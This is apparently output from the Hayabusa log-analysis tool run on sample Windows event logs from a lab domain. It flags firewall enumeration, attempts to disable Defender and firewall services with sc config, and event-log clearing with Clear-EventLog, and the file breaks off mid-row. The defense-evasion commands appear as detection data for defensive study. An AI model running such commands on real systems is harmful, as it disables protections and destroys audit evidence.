+09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"$this.PSBase.CimInstanceProperties[""Status""].Value + "" ("" + ($this.PSBase.CimInstanceProperties[""StatusCode""].Value + 0) + "")""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:08.317 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"[Microsoft.Windows.Firewall.Commands.Formatting.Formatter]::FormatEnforcementStatus($this.PSBase.CimInstanceProperties[""EnforcementStatus""].Value)",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration 
Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:08.317 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType]($this.PSBase.CimInstanceProperties['PolicyStoreSourceType'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:08.317 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['PolicyStoreSourceType'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:12.926 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-NetFirewallRule): ""Get-NetFirewallRule"" ParameterBinding(Get-NetFirewallRule): name=""Name""; value="""" ParameterBinding(Get-NetFirewallRule): name=""DisplayName""; value="""" ParameterBinding(Get-NetFirewallRule): name=""Description""; value="""" ParameterBinding(Get-NetFirewallRule): name=""DisplayGroup""; value="""" ParameterBinding(Get-NetFirewallRule): name=""Group""; value="""" ParameterBinding(Get-NetFirewallRule): name=""Enabled""; value="""" ParameterBinding(Get-NetFirewallRule): name=""Direction""; value="""" ParameterBinding(Get-NetFirewallRule): name=""Action""; value="""" ParameterBinding(Get-NetFirewallRule): name=""EdgeTraversalPolicy""; value="""" ParameterBinding(Get-NetFirewallRule): name=""LooseSourceMapping""; value="""" 
ParameterBinding(Get-NetFirewallRule): name=""LocalOnlyMapping""; value="""" ParameterBinding(Get-NetFirewallRule): name=""Owner""; value="""" ParameterBinding(Get-NetFirewallRule): name=""PrimaryStatus""; value="""" ParameterBinding(Get-NetFirewallRule): name=""Status""; value="""" ParameterBinding(Get-NetFirewallRule): name=""PolicyStoreSource""; value="""" ParameterBinding(Get-NetFirewallRule): name=""PolicyStoreSourceType""; value="""" ParameterBinding(Get-NetFirewallRule): name=""AssociatedNetFirewallAddressFilter""; value="""" ParameterBinding(Get-NetFirewallRule): name=""AssociatedNetFirewallApplicationFilter""; value="""" ParameterBinding(Get-NetFirewallRule): name=""AssociatedNetFirewallInterfaceFilter""; value="""" ParameterBinding(Get-NetFirewallRule): name=""AssociatedNetFirewallInterfaceTypeFilter""; value="""" ParameterBinding(Get-NetFirewallRule): name=""AssociatedNetFirewallPortFilter""; value="""" ParameterBinding(Get-NetFirewallRule): name=""AssociatedNetFirewallSecurityFilter""; value="""" ParameterBinding(Get-NetFirewallRule): name=""AssociatedNetFirewallServiceFilter""; value="""" ParameterBinding(Get-NetFirewallRule): name=""AssociatedNetFirewallProfile""; value="""" ParameterBinding(Get-NetFirewallRule): name=""All""; value=""False"" ParameterBinding(Get-NetFirewallRule): name=""PolicyStore""; value="""" ParameterBinding(Get-NetFirewallRule): name=""GPOSession""; value="""" ParameterBinding(Get-NetFirewallRule): name=""TracePolicyStore""; value=""False"" ParameterBinding(Get-NetFirewallRule): name=""CimSession""; value="""" ParameterBinding(Get-NetFirewallRule): name=""ThrottleLimit""; value=""0"" ParameterBinding(Get-NetFirewallRule): name=""AsJob""; value=""False"" TerminatingError(): ""The pipeline has been stopped.""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration 
Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:12.926 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:13.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Get-NetFirewallSetting,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:13.786 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption]($this.PSBase.CimInstanceProperties['Exemptions'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['Exemptions'].Value 
= [System.Uint32][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['EnableStatefulFtp'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['EnableStatefulFtp'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['EnableStatefulPptp'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock 
Log,param($x); $this.PSBase.CimInstanceProperties['EnableStatefulPptp'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile]($this.PSBase.CimInstanceProperties['Profile'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['Profile'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['RequireFullAuthSupport'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:13.801 
+09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['RequireFullAuthSupport'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck]($this.PSBase.CimInstanceProperties['CertValidationLevel'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['CertValidationLevel'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT]($this.PSBase.CimInstanceProperties['AllowIPsecThroughNAT'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration 
Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['AllowIPsecThroughNAT'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"$x = $this.PSBase.CimInstanceProperties[""MaxSAIdleTimeSeconds""]; if ($x -ne $null -and $x.Value -ne $null -and $x.Value.ToString().Equals(""0"")) { ""NotConfigured""; } else { $x.Value }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"param($x) if ($x.ToUpperInvariant().Equals(""NOTCONFIGURED"")) { $this.PSBase.CimInstanceProperties[""MaxSAIdleTimeSeconds""].Value = 0; } else { $this.PSBase.CimInstanceProperties[""MaxSAIdleTimeSeconds""].Value = [uint32]$x; }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding]($this.PSBase.CimInstanceProperties['KeyEncoding'].Value + 
0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['KeyEncoding'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing]($this.PSBase.CimInstanceProperties['EnablePacketQueuing'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:13.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['EnablePacketQueuing'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:13.848 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-NetFirewallSetting): ""Get-NetFirewallSetting"" 
ParameterBinding(Get-NetFirewallSetting): name=""All""; value=""False"" ParameterBinding(Get-NetFirewallSetting): name=""PolicyStore""; value="""" ParameterBinding(Get-NetFirewallSetting): name=""GPOSession""; value="""" ParameterBinding(Get-NetFirewallSetting): name=""CimSession""; value="""" ParameterBinding(Get-NetFirewallSetting): name=""ThrottleLimit""; value=""0"" ParameterBinding(Get-NetFirewallSetting): name=""AsJob""; value=""False""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:13.848 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""MSFT_NetSecuritySettingData (InstanceID = ""MSFT?GlobalIPSecSettingData"")""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:13.864 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:57:04.361 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc config sense start= disabled | Path: C:\Windows\System32\sc.exe | PID: 0xe58 | User: admmig | LID: 
0x1844fa6,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID4688-Defender service deactivation attempt.evtx 2021-10-25 16:57:05.977 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc config mpssvc start= disabled | Path: C:\Windows\System32\sc.exe | PID: 0x2ebc | User: admmig | LID: 0x1844fa6,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID4688-Defender service deactivation attempt.evtx 2021-10-25 16:57:08.463 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc config WinDefend start= disabled | Path: C:\Windows\System32\sc.exe | PID: 0x2e40 | User: admmig | LID: 0x1844fa6,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID4688-Defender service deactivation attempt.evtx 2021-10-26 03:04:24.089 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"Clear-EventLog -LogName application, system -confirm",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID800-4103-4104-Clear event log attempt.evtx 2021-10-26 03:04:30.334 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:04:30.334 
+09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Clear-EventLog): ""Clear-EventLog"" ParameterBinding(Clear-EventLog): name=""LogName""; value=""application, system"" ParameterBinding(Clear-EventLog): name=""Confirm""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID800-4103-4104-Clear event log attempt.evtx 2021-10-26 03:04:30.334 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID800-4103-4104-Clear event log attempt.evtx 2021-10-26 03:04:30.350 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID800-4103-4104-Clear event log attempt.evtx 2021-10-26 03:09:51.875 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:09.002 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:09.080 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: 
admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:09.095 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:09.127 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:09.142 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:09.215 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:09.293 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:09.340 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense 
Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:09.355 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:09.418 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:09.480 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:09.527 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:09.574 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:09.591 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:09.606 +09:00,FS03.offsec.lan,104,high,Evas,System 
Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:09.638 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:09.653 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:09.669 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:09.747 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:09.778 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log 